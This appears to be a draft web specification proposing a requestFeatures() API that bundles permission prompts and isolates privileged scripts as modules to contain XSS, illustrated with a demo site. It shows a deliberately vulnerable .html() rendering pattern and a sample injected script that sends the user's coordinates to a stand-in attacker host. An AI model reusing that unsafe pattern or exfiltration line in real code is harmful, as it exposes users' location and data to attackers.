This specification describes a mechanism that enables authors to request access to multiple additional user agent capabilities with a single call rather than many, thereby prompting the user for permission only once, and that encapsulates the resulting access in a secure container in order to protect the increased privileges granted to a web application from cross-site scripting (XSS) attacks.
This document is currently more of a sketch of a proposal than a properly defined specification. The terminology is loose in parts, and requirements need a fair amount of tightening.
As it currently stands, this document is nothing more than a proposal from its editor, with no backing, implied or otherwise, from any other party.
As user agents provide increasing access to privileged capabilities that expose sensitive aspects of users' data and environment (geolocation, contacts, calendar, camera, local storage…), two distinct yet related problems increase in lockstep.
First, since these capabilities cannot be safely granted without the user's decision, and given that many of them cannot be integrated into the flow of an action that feels natural to the user (in the way that, for example, file system access can be through a file picker), requesting permission for multiple capabilities leads to multiple user prompts of some form. The resulting experience is less than ideal, and what's more it trains users to blindly accept such requests, even when they are not modal.
Additionally, the severity of cross-site scripting (XSS) attacks is increased. XSS vulnerabilities are extremely common, but in many cases their presence has led to little more than harmless pranks, if anything at all. This is largely because web content runs sandboxed inside the user agent, so that the power of an XSS attack is only as great as that of the site being compromised, which in many cases is minimal. With additional privileges being granted, however, the compromised site is far less sandboxed than it previously was. Users should naturally only grant elevated privileges to sites that they can ascertain are legit and trustworthy; we cannot, however, require of them that they audit the code powering such sites looking for XSS vulnerabilities.
Ideally, protection from XSS should therefore be strengthened when additional capabilities are granted more or less in bulk, all the while without breaking existing content, without requiring massive remodelling of the web user agent security model, and with minimal requirements placed upon authors (preferably no more than a few new methods and reuse of an existing common convention).
Note that there already exist means for web site authors to protect against XSS attacks, for instance the Content Security Policy [[CSP]]. These, however, are voluntary protections put in place by competent site administrators. As such, they are extremely useful, but we can simultaneously approach the problem from the other end, namely from the client side, so that users are equally protected from the hapless.
As an example, we will take a simple community microblogging system: Unicorner. It's a typical microblogging site, where those interested in unicorns flock to discuss their passion. The site is entirely legit, and run by well-meaning unicorn-lovers.
When posting a message, the user transmits some geolocation information which is then partially available to others as a city or region (rather than with the exact coordinates). Messages are also stored locally so that people can access their previous discussions even when the site is offline. This part touches on our first problem: multiple permission requests need to be made before the site is even useful.
The client code trusts the server to sanitise the data it sends (or simply did not think the matter through) and inserts the content of messages into the page as full HTML when plain text would suffice. Naturally, something is wrong with the server's sanitisation code, and some HTML can be slipped through if crafted correctly. This brings in our XSS vulnerability.
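To make the flaw concrete, here is a minimal sketch of the sort of rendering code at fault (the actual unicorner.js rendering code is not reproduced in this section, and msg is a hypothetical message object):

// Vulnerable pattern: server-provided message text is interpreted as HTML,
// so a crafted message can inject markup and, through it, a script such as
// notatallevil.js.
$("<li class='message'></li>")
    .html(msg.text)
    .appendTo("#messages");

// The same rendering using text insertion would not execute any markup:
$("<li class='message'></li>")
    .text(msg.text)
    .appendTo("#messages");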
No server-side code was developed for this example, but what it does (or fails to do) can easily be inferred. Also, the notatallevil.js script that gets injected would normally live on a different server.
You can look at the example in action (download). It requires Geolocation and IndexedDB support (though you can still read the source if your browser does not support those).
Two things can be noted: there are too many permission prompts for a smooth experience, and simply because you looked at a given, innocent-looking message your position is now being broadcast to an evil third party (and given that the message is stored locally, this could go on for a while; sites that use localStorage to cache scripts locally would present an even more interesting opportunity).
We will now show how to implement the very same functionality using FRAC. You can try the example (download), but it will only work in a FRAC-enabled browser, and as of this writing those are few and far between. We can look at the code, however, to see how it has been modified.
The first thing to note is that the changes required to the entire code are extremely minimal:
diff -wU 1 xss-pwnd/index.html frac-unicorner/index.html
--- xss-pwnd/index.html 2011-05-26 16:58:10.000000000 +0200
+++ frac-unicorner/index.html 2011-05-26 17:26:50.000000000 +0200
@@ -18,6 +18,5 @@
     <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.6.0/jquery.min.js'></script>
-    <script src='unicorner.js'></script>
     <script>
-      jQuery(function () {
-        UI.loadEverything();
+      requestFeatures(["geolocation", "indexeddb"], ["unicorner.js"], function (unicorner) {
+        unicorner.UI.loadEverything(jQuery);
       });
diff -wU 1 xss-pwnd/unicorner.js frac-unicorner/unicorner.js
--- xss-pwnd/unicorner.js 2011-05-26 17:12:03.000000000 +0200
+++ frac-unicorner/unicorner.js 2011-05-26 17:27:16.000000000 +0200
@@ -1,6 +1,6 @@
-(function (exports, $) {
-    var curLocation = null, db, store;
+var curLocation = null, db, store, $;
 exports.UI = {
-    loadEverything: function () {
+    loadEverything: function (jq) {
+        $ = jq;
         Messaging.watchLocation();
@@ -55,2 +55 @@
 };
-})(window, jQuery);
We have simply: 1) removed the direct loading of the application script, 2) replaced the jQuery onload handler with a call to requestFeatures, and 3) unwrapped the script from its self-calling anonymous function since we don't need that protection anymore.
Loading the script is performed with the following code:
requestFeatures(["geolocation", "indexeddb"], ["unicorner.js"], function (unicorner) { unicorner.UI.loadEverything(jQuery); });
This simple call takes three parameters. The first is a list of capabilities required for the application to execute (in this case geolocation and access to the IndexedDB local storage). By bundling these in a single array, the user agent is able to display a user interface that requests permission for all the capabilities at once, thereby making the user experience more fluid (an example of a potential user interface for such an approach can be seen in the Feature Permissions Playground).
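For contrast, here is a rough sketch of the pre-FRAC flow, in which each capability is requested at its point of use and typically triggers its own prompt (whether IndexedDB prompts at all is implementation-dependent):

// Each call below can surface a separate permission request to the user.
navigator.geolocation.getCurrentPosition(function (pos) { /* ... */ });   // geolocation prompt
var request = indexedDB.open("unicorner");   // possibly another prompt, depending on the engine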
Second is a list of the scripts that we wish to load and provide with these capabilities (in this case there is only one, unicorner.js). These are regular pieces of Javascript code, except that instead of sharing the same execution scope as the main one, they are encapsulated in a manner similar to that of CommonJS modules [[!COMMONJS]]. They have access to the same host objects that are exposed in the main scope (navigator, document, etc.) but global variables defined there in Javascript are invisible to them. Conversely, their own globals are not available to the main scope. Such scripts expose their functionality by assigning to an exports variable; users of CommonJS will be familiar with the approach.
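As a rough illustration of this scoping (a made-up module, not taken from unicorner.js), consider the following:

// hypothetical-module.js, loaded through requestFeatures()
var secret = "only visible inside this module";   // not added to the main scope's window

document.title = "Loaded as a module";            // host objects behave as usual

exports.greet = function (name) {                 // made available to the requesting scope
    return "Hello, " + name;
};

In the main scope, window.secret remains undefined, while the module object handed to the requestFeatures callback exposes greet().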
The third and final parameter is a callback, which is invoked once the capabilities have been accepted and the scripts have loaded. It gets called with a list of objects, each of which corresponds to the exports variable of one script. Therefore, the following code in unicorner.js:
exports.UI = {
    loadEverything: function (jq) {
        // ...
    }
};
makes it possible to call unicorner.UI.loadEverything(jQuery) as in the previous example.
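For instance, requesting several scripts yields one module object per script, in the same order; the sketch below assumes, as in the earlier example, that each module is passed as a separate callback argument (the script names are made up):

requestFeatures(["geolocation"], ["messaging.js", "ui.js"], function (messaging, ui) {
    // messaging corresponds to the exports of messaging.js,
    // ui to the exports of ui.js
    ui.start(messaging);
});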
You will note that the XSS vulnerability is still present. However, calling requestFeatures tells the user agent that the author has decided to use elevated privileges only in code loaded through requestFeatures, and therefore the injected code's attempt to use Geolocation will fail. Code could be injected that calls requestFeatures directly, but since requestFeatures is strictly limited to loading scripts from the same origin, that attack is precluded as well.
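To illustrate, here is a sketch of the kind of payload described above (not the actual notatallevil.js); injected into the main scope, its attempt to use Geolocation now fails, although precisely how the failure surfaces (silently or through the error callback) is an assumption here:

// Runs in the main scope, where no privileged features have been granted.
navigator.geolocation.getCurrentPosition(
    function (pos) {
        // never reached: the main scope's request for geolocation is declined
        new Image().src = "http://evil.example.org/track?pos=" +
                          pos.coords.latitude + "," + pos.coords.longitude;
    },
    function (error) {
        // the error callback fires instead (e.g. PERMISSION_DENIED)
    }
);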
In conclusion, with the addition of a simple API and a subset of the familiar CommonJS modules, we have both improved the user experience for web applications accessing multiple capabilities, and provided additional protection against XSS attacks.
This specification defines conformance criteria that apply to a single product: a user agent that implements the interfaces defined in this document.
A user agent that exposes these APIs to Javascript [[!ECMA-262]] MUST implement them in accordance with the ECMAScript Bindings defined by Web IDL [[!WEBIDL]].
This interface defines a simple method for loading modular scripts that have access to a specific set of privileged features.
Requests a list of features that are to be made available (subject to the user's agreement) to a list of scripts, which are loaded in a contained manner as described in section . When these two operations have been performed successfully, the callback is called with a list of objects representing each script module.
A list of feature strings (e.g. geolocation, contacts, indexeddb) that the author is requesting access to. Individual feature strings are defined by their respective specifications. A user agent MUST ignore feature strings which it does not know. Vendor-specific features are expected to be identified using vendor-prefixed strings. Mechanisms to obtain user agreement for access to these features are left up to implementations. If this list is empty, no user agreement is necessary and the modules are loaded immediately.
While the user agent is expected to make it easy to accept or decline all of the requested features in bulk, such outcomes are not required. Any number of features in the set can be accepted or rejected, and the scripts will still load; they will simply have access to only those features which were accepted. Likewise, irrespective of the user's decision concerning these features, requests for privileged features made from the main scope are expected to be declined (see the sketch following these parameter descriptions).
An API to discover which features have been granted and which haven't would prove useful in this context. That is indeed part of what the Feature Permissions specification proposes.
A list of URLs for the scripts to load. If a script fails to load, it is represented by an undefined object in the callback. Each of the scripts is loaded as a contained module, as described in section .
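As a sketch of these rules (x-vnd-example-sparkle is a made-up vendor-prefixed feature string, and the behaviour shown for partially granted or empty requests follows the descriptions above):

// The unknown vendor-prefixed string is simply ignored by user agents that
// do not recognise it; unicorner.js loads regardless of how many of the
// requested features the user actually grants.
requestFeatures(["geolocation", "x-vnd-example-sparkle"], ["unicorner.js"], function (unicorner) {
    unicorner.UI.loadEverything(jQuery);
});

// An empty feature list requires no user agreement: the modules are loaded
// immediately, with no additional privileges.
requestFeatures([], ["helpers.js"], function (helpers) {
    // helpers.js is a made-up, unprivileged module
});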
This is the wrapper interface for requestFeatures() completion callbacks.
The global scope in each module script is a proxy to the main scope such that the many host-defined properties of window are available. However, script-defined properties are restricted to their respective scopes.
The one addition to the module scope is the exports attribute, an empty object that the module can modify in order to make functionality available to requiring scopes. The exports object functions as defined in [[!COMMONJS]].
Naturally, a module can still shoot itself in the foot and expose functionality that would open the privileged features to XSS vulnerabilities, but it is nevertheless much less likely to happen by mistake. The simplest way of shooting oneself in the foot in a module would be as follows:
// assuming geolocation privileges have been granted
exports.geolocation = navigator.geolocation;
It is, however, difficult to protect against active stupidity — we only endeavour to contain the more passive kind here.
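By way of contrast, a module can expose only the narrow operation it actually needs to share rather than the privileged object itself; whereRoughly below is a hypothetical helper, not part of the example application:

// assuming geolocation privileges have been granted to this module
exports.whereRoughly = function (callback) {
    navigator.geolocation.getCurrentPosition(function (pos) {
        // round the coordinates before they ever leave the module
        callback(Math.round(pos.coords.latitude), Math.round(pos.coords.longitude));
    });
};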
A sketchy IDL is provided below. Questions are open as to whether WindowProxy is the proper interface to inherit from, and as to the best way of specifying the access behaviour to the requesting scope's window.
Many thanks to Dominique Hazaël-Massieux and Bryan Sullivan for being the early sounding boards for this idea while in Seoul, as well as to Doug Turner and the folks at Mozilla Labs for their feedback.